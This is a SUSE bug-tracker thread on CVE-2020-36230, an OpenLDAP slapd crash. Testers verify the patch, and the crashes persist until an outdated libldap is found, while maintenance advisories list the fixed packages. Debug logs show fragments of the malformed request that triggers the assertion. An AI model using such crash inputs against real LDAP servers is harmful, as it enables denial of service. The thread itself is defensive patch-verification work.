Bug 1182408 - (CVE-2020-36230) VUL-0: CVE-2020-36230: openldap2: Assertion failure in ber_next_element in decode.c
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Importance: P3 - Medium, Normal
Assigned To: Security Team bot
https://smash.suse.de/issue/276466/
CVSSv3.1:SUSE:CVE-2020-36230:7.5:(AV:...
Reported: 2021-02-18 09:34 UTC by Alexander Bergmann
Modified: 2022-05-06 07:26 UTC (History)
Found By: Security Response Team
Comment 2 jun wang 2021-03-02 13:22:03 UTC
I am testing openldap2 update SUSE:Maintenance:18481:236954, and following the link https://bugs.openldap.org/show_bug.cgi?id=9423#c0, I ran the command BEFORE and AFTER and got the same failed slapd service:

# systemctl status slapd.service                                                                                              
● slapd.service - OpenLDAP Server Daemon
   Loaded: loaded (/usr/lib/systemd/system/slapd.service; disabled; vendor preset: disabled)
   Active: failed (Result: signal) since Tue 2021-03-02 21:15:19 CST; 1s ago
  Process: 31803 ExecStart=/usr/lib/openldap/start (code=exited, status=0/SUCCESS)
 Main PID: 31815 (code=killed, signal=ABRT)

Mar 02 21:15:14 linux-zeaz slapd[31803]: looking for plugins in '/usr/lib64/sasl2', failed to open directory, er>
Mar 02 21:15:14 linux-zeaz slapd[31803]: @(#) $OpenLDAP: slapd 2.4.46 $
                                                 opensuse-buildservice@opensuse.org
Mar 02 21:15:15 linux-zeaz slapd[31803]: looking for plugins in '/usr/lib64/sasl2', failed to open directory, er>
Mar 02 21:15:15 linux-zeaz slapd[31815]: slapd starting
Mar 02 21:15:15 linux-zeaz start[31803]: Starting ldap-server
Mar 02 21:15:15 linux-zeaz systemd[1]: Started OpenLDAP Server Daemon.
Mar 02 21:15:19 linux-zeaz slapd[31815]: conn=1000 fd=11 ACCEPT from IP=[::1]:39884 (IP=[::]:389)
Mar 02 21:15:19 linux-zeaz systemd[1]: slapd.service: Main process exited, code=killed, status=6/ABRT
Mar 02 21:15:19 linux-zeaz systemd[1]: slapd.service: Unit entered failed state.
Mar 02 21:15:19 linux-zeaz systemd[1]: slapd.service: Failed with result 'signal'.

Is this expected? This is a security update, I understand it a little hard.
Comment 4 Swamp Workflow Management 2021-03-03 20:18:54 UTC
SUSE-SU-2021:0693-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud Crowbar 8 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 9 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 8 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 7 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP5 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    openldap2-2.4.41-18.83.1
HPE Helion Openstack 8 (src):    openldap2-2.4.41-18.83.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 5 Swamp Workflow Management 2021-03-03 20:23:33 UTC
SUSE-SU-2021:0692-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP5 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Module for Legacy Software 12 (src):    openldap2-2.4.41-39.1

Comment 6 jun wang 2021-03-04 07:14:45 UTC
I simply debugged this bug after the update on SLES15SP1, and got the output:

# /usr/lib/openldap/start
...
Starting ldap-server+ exec /usr/sbin/slapd -d 3 -h 'ldap:///  ldapi:///' -f /etc/openldap/slapd.conf -u ldap -g ldap -o slp=off
...
60408612 slap_listener_activate(8): 
60408612 >>> slap_listener(ldap:///)
60408612 connection_get(13): got connid=1000
60408612 connection_read(13): checking for input on id=1000
ber_get_next
ldap_read: want=8, got=8
  0000:  30 82 01 e4 02 04 30 30                            0.....00          
ldap_read: want=480, got=480
ber_get_next: tag 0x30 len 484 contents:
60408612 op tag 0x4a, time 1614841362
ber_get_next
ldap_read: want=8 error=Resource temporarily unavailable
60408612 conn=1000 op=0 do_delete
ber_scanf fmt (m) ber:
60408612 <= get_ctrls: n=0 rc=0 err=""
60408612 >>> dnPrettyNormal: <O=ᄇᄇᄇᄇᄇᄇ鱗ᄇﶲᄇᄇᄇᄇᄇᄇᄇ,


2.5.4.39=0k000000000010�00000000000000000000000000008.0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000>
slapd: decode.c:686: ber_next_element: Assertion `last != NULL' failed.
Aborted

Does this mean that this bug is not fixed?
Comment 7 William Brown 2021-03-05 02:01:09 UTC
It may not be. Perhaps there is an issue with the upstream patch. I will investigate early next week (I have another bug to investigate today :( )
Comment 8 jun wang 2021-03-05 02:14:18 UTC
(In reply to William Brown from comment #7)
> It may not be. Perhaps there is an issue with the upstream patch. I will
> investigate early next week (I have another bug to investigate today :( )

Glad to get your reply, and thank you.

And I have another question. The reproducers (including this one) from the bugs in this update SUSE:Maintenance:18499:236986 always abort the openldap service on SLES11SP4 BEFORE and AFTER the update; if possible, please help to investigate this issue.

Thank you again.
Comment 9 William Brown 2021-03-08 02:35:42 UTC
I have been able to reproduce, I will attempt to investigate further.
Comment 10 William Brown 2021-03-08 02:52:19 UTC
Okay I think the issue is you may not have updated libldap. I hit the same issue on my system where libldap has the fix but it wasn't updated.

Can you confirm the version of libldap you are using?
Comment 11 jun wang 2021-03-08 03:07:34 UTC
(In reply to William Brown from comment #10)
> Okay I think the issue is you may not have updated libldap. I hit the same
> issue on my system where libldap has the fix but it wasn't updated.
> 
> Can you confirm the version of libldap you are using?

Yes, you are right. I missed updating libldap:

# rpm -qa | grep libldap                                                                                                      
libldap-2_4-2-32bit-2.4.46-9.48.1.x86_64
libldap-2_4-2-2.4.46-9.31.1.x86_64
libldapcpp1-0.3.1-1.33.x86_64
libldap-data-2.4.46-9.48.1.noarch

And I made sure this issue was fixed after updating libldap.

Thank you for your help. And do you know why the reproducers don't work on SLES11SP4?
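
The check behind comment 10's diagnosis, as an added example that is not part of the original thread or of any SUSE tooling: it parses an `rpm -qa` listing and reports openldap2-built packages whose version-release differs from the fixed build. The function name, the package-name patterns and the use of 2.4.46-9.48.1 (from the SUSE-SU-2021:0723-1 notice in comment 16) as the expected value are assumptions of this example.

```shell
#!/bin/sh
# Added example: find OpenLDAP packages left behind at an older version-release
# than the rest of a maintenance update (the situation diagnosed in comment 10).

# Constructed sample input: the `rpm -qa | grep libldap` listing from comment 11.
SAMPLE_RPM_LIST='libldap-2_4-2-32bit-2.4.46-9.48.1.x86_64
libldap-2_4-2-2.4.46-9.31.1.x86_64
libldapcpp1-0.3.1-1.33.x86_64
libldap-data-2.4.46-9.48.1.noarch'

# Version-release of the fixed build, taken from the SUSE-SU-2021:0723-1 notice.
FIXED_VR='2.4.46-9.48.1'

# stale_openldap_pkgs EXPECTED_VR
# Reads name-version-release.arch lines on stdin and prints "name version-release"
# for every openldap2-built package that is not at EXPECTED_VR.
stale_openldap_pkgs() {
    expected=$1
    while IFS= read -r nvra; do
        [ -n "$nvra" ] || continue
        nvr=${nvra%.*}          # drop ".arch"
        release=${nvr##*-}      # text after the last "-"
        nv=${nvr%-*}
        version=${nv##*-}       # text after the second-to-last "-"
        name=${nv%-*}           # the rest; may itself contain "-"
        # Assumption: these name patterns cover the binary packages built from
        # the openldap2 source (names as they appear in this thread). Anything
        # else, e.g. libldapcpp1 with its own versioning, is ignored.
        case $name in
            openldap2|openldap2-*|libldap-2_4-2|libldap-2_4-2-*|libldap-data) ;;
            *) continue ;;
        esac
        if [ "$version-$release" != "$expected" ]; then
            printf '%s %s-%s\n' "$name" "$version" "$release"
        fi
    done
    return 0
}

# On a live host, feed the function from the RPM database instead of the sample:
#   rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}.%{ARCH}\n' | stale_openldap_pkgs "$FIXED_VR"
stale=$(printf '%s\n' "$SAMPLE_RPM_LIST" | stale_openldap_pkgs "$FIXED_VR")
if [ -n "$stale" ]; then
    printf 'not at %s:\n%s\n' "$FIXED_VR" "$stale"
fi
```
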
Comment 12 William Brown 2021-03-08 03:21:07 UTC
As in, on sle11sp4 you can not cause the crash on the older version?
Comment 13 jun wang 2021-03-08 03:44:09 UTC
(In reply to William Brown from comment #12)
> As in, on sle11sp4 you can not cause the crash on the older version?

On sles11sp4, the openldap service crashed BEFORE and AFTER the update. These reproducers can't work on sles11sp4?
Comment 14 William Brown 2021-03-08 03:45:33 UTC
(In reply to jun wang from comment #13)
> (In reply to William Brown from comment #12)
> > As in, on sle11sp4 you can not cause the crash on the older version?
> 
> ON sles11sp4, openldap service crashed BEFORE and AFTER update. These
> reproducers can't work on sles11sp4 ?

I don't understand? You're saying it both crashed but also the reproducers can't work? What's going on? Again, have you checked libldap is updated?
Comment 15 jun wang 2021-03-08 04:03:49 UTC
(In reply to William Brown from comment #14)
> > ON sles11sp4, openldap service crashed BEFORE and AFTER update. These
> > reproducers can't work on sles11sp4 ?
> 
> I don't understand? You're saying it both crashed but also the reproducers
> can't work? What's going on? Again, have you checked libldap is updated?

I mean that both (BEFORE and AFTER) crashed, reproducers shall work. Yes, I checked the version of libldap, it was updated: libldap-2_4-2-2.4.26-0.74.22.1

This is the output on sles11sp4 after the update; maybe it is useful for you.

# exec /opt/suse/lib/openldap/slapd -h 'ldap:///  ' -f /etc/openldap/slapd.conf -u ldap -g ldap -o slp=on -d 3
...
slapd starting
slap_listener_activate(8): 
>>> slap_listener(ldap:///)
connection_get(12): got connid=1000
connection_read(12): checking for input on id=1000
ber_get_next
ldap_read: want=8, got=8
  0000:  30 82 01 e4 02 04 30 30                            0.....00          
ldap_read: want=480, got=480
ber_get_next: tag 0x30 len 484 contents:
op tag 0x4a, time 1615176013
ber_get_next
ldap_read: want=8 error=Resource temporarily unavailable
conn=1000 op=0 do_delete
ber_scanf fmt (m) ber:
<= get_ctrls: n=0 rc=0 err=""
>>> dnPrettyNormal: <O=ᄇᄇᄇᄇᄇᄇ鱗ᄇﶲᄇᄇᄇᄇᄇᄇᄇ,


2.5.4.39=0k000000000010�00000000000000000000000000008.0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000>
slapd: decode.c:686: ber_next_element: Assertion `last != ((void *)0)' failed.
Comment 16 Swamp Workflow Management 2021-03-08 20:19:59 UTC
SUSE-SU-2021:0723-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Manager Server 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Manager Retail Branch Server 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Manager Proxy 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server for SAP 15-SP1 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server for SAP 15 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-SP1-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-SP1-BCL (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Legacy Software 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Development Tools 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    openldap2-2.4.46-9.48.1
SUSE Enterprise Storage 6 (src):    openldap2-2.4.46-9.48.1
SUSE CaaS Platform 4.0 (src):    openldap2-2.4.46-9.48.1

Comment 22 jun wang 2021-03-10 08:04:45 UTC
Hi William,

I updated all new packages on SLES11SP4:

# rpm -q compat-libldap-2_3-0 libldap-2_4-2 libldap-2_4-2-32bit libldap-openssl1-2_4-2 libldap-openssl1-2_4-2-32bit libldap-openssl1-2_4-2-x86 openldap2 openldap2-back-meta openldap2-client openldap2-client-openssl1 openldap2-openssl1
compat-libldap-2_3-0-2.3.37-2.74.22.1
libldap-2_4-2-2.4.26-0.74.22.1
libldap-2_4-2-32bit-2.4.26-0.74.22.1
libldap-openssl1-2_4-2-2.4.26-0.74.22.1
libldap-openssl1-2_4-2-32bit-2.4.26-0.74.22.1
package libldap-openssl1-2_4-2-x86 is not installed
openldap2-2.4.26-0.74.22.1
openldap2-back-meta-2.4.26-0.74.22.1
openldap2-client-2.4.26-0.74.22.1
openldap2-client-openssl1-2.4.26-0.74.22.1
openldap2-openssl1-2.4.26-0.74.22.1

# ldd /usr/lib/openldap/slapd 
        linux-vdso.so.1 =>  (0x00007ffd93ea6000)
        libldap_r-2.4.so.2 => /usr/lib64/libldap_r-2.4.so.2 (0x00007f66123df000)
        liblber-2.4.so.2 => /usr/lib64/liblber-2.4.so.2 (0x00007f66121d0000)
        libltdl.so.7 => /usr/lib64/libltdl.so.7 (0x00007f6611fc6000)
        libdb-4.5.so => /usr/lib64/libdb-4.5.so (0x00007f6611c8e000)
        libslp.so.1 => /usr/lib64/libslp.so.1 (0x00007f6611a75000)
        libm.so.6 => /lib64/libm.so.6 (0x00007f66117fa000)
        libnsl.so.1 => /lib64/libnsl.so.1 (0x00007f66115e2000)
        libsasl2.so.2 => /usr/lib64/libsasl2.so.2 (0x00007f66113c7000)
        libdl.so.2 => /lib64/libdl.so.2 (0x00007f66111c3000)
        libssl.so.0.9.8 => /usr/lib64/libssl.so.0.9.8 (0x00007f6610f6b000)
        libcrypto.so.0.9.8 => /usr/lib64/libcrypto.so.0.9.8 (0x00007f6610bc8000)
        libcrypt.so.1 => /lib64/libcrypt.so.1 (0x00007f661098d000)
        libresolv.so.2 => /lib64/libresolv.so.2 (0x00007f6610776000)
        libwrap.so.0 => /lib64/libwrap.so.0 (0x00007f661056b000)
        libpthread.so.0 => /lib64/libpthread.so.0 (0x00007f661034e000)
        libc.so.6 => /lib64/libc.so.6 (0x00007f660ffd2000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f66128bf000)
        libz.so.1 => /lib64/libz.so.1 (0x00007f660fdbc000)

# rpm -qf /usr/lib64/libldap_r-2.4.so.2
libldap-2_4-2-2.4.26-0.74.22.1


But the openldap service still crashed with the reproducer from this bug:
(reproducer from https://bugs.openldap.org/show_bug.cgi?id=9423)

# exec /usr/lib/openldap/slapd -h 'ldap:///  ' -f /etc/openldap/slapd.conf -u ldap -g ldap -o slp=on -d 3 2>&1 | tee openldap2.log
...
2.5.4.39=0k00000000001000000000000000000000000000008.0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000>
slapd: decode.c:686: ber_next_element: Assertion `last != ((void *)0)' failed.

Only bug#1182408 and bug#1182411 still crashed after updating all new packages, and I made sure the other bugs were fixed.

Please log in to "homer" to check this issue.
Comment 23 William Brown 2021-03-12 02:43:54 UTC
Sorry, my key is no longer on this system. I can't log in. Can you re-add it?
Comment 24 jun wang 2021-03-12 03:03:25 UTC
(In reply to William Brown from comment #23)
> Sorry, my key is no longer on this system. I can't login. Can you re-add it?

I added your key into the remote host, please have a try.
Comment 25 William Brown 2021-03-12 03:19:58 UTC
homer:~ # rpm -q --changelog libldap-2_4-2  | less
homer:~ #


It's still the wrong version of the package. Changelog here shows this build is from June 2020, not Feb 2021.
Comment 26 William Brown 2021-03-12 04:04:55 UTC
Now I'm even more confused. In sle 11 sp4 this should be based on openldap 2.3, not 2.4. How did you get 2.4 packages on there? 

I think this is an IBS problem, not a packaging one at this point sorry.
Comment 29 Swamp Workflow Management 2021-03-14 17:33:37 UTC
openSUSE-SU-2021:0408-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    openldap2-2.4.46-lp152.14.18.1
Comment 33 jun wang 2021-03-18 07:57:00 UTC
# ldd /usr/lib/openldap/slapd                                                                                                 
    linux-vdso.so.1 =>  (0x00007ffc49353000)
    libldap_r-2.4.so.2 => /usr/lib64/libldap_r-2.4.so.2 (0x00007fed217f6000)

# ll /usr/lib64/libldap_r-2.4.so.2.7.1 
-rwxr-xr-x 1 root root 323304 Mar  2 02:25 /usr/lib64/libldap_r-2.4.so.2.7.1

# ll /usr/lib64/libldap-2.4.so.2.7.1 
-rwxr-xr-x 1 root root 298120 Mar  2 02:25 /usr/lib64/libldap-2.4.so.2.7.1

Looking at the above output, there are two ldap libraries, libldap-2.4.so.2.7.1 and libldap_r-2.4.so.2.7.1; slapd is using libldap_r-2.4.so.2.7.1. Is it possible that slapd should use the library libldap-2.4.so.2.7.1?
Comment 52 Swamp Workflow Management 2021-04-16 13:16:15 UTC
SUSE-SU-2021:14700-1: An update that solves 11 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420,1184020
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Linux Enterprise Server 11-SP4-LTSS (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Server 11-SECURITY (src):    openldap2-client-openssl1-2.4.26-0.74.26.1
SUSE Linux Enterprise Point of Sale 11-SP3 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Debuginfo 11-SP3 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1, openldap2-client-openssl1-2.4.26-0.74.26.1

Comment 53 Marcus Meissner 2021-08-16 11:26:16 UTC
released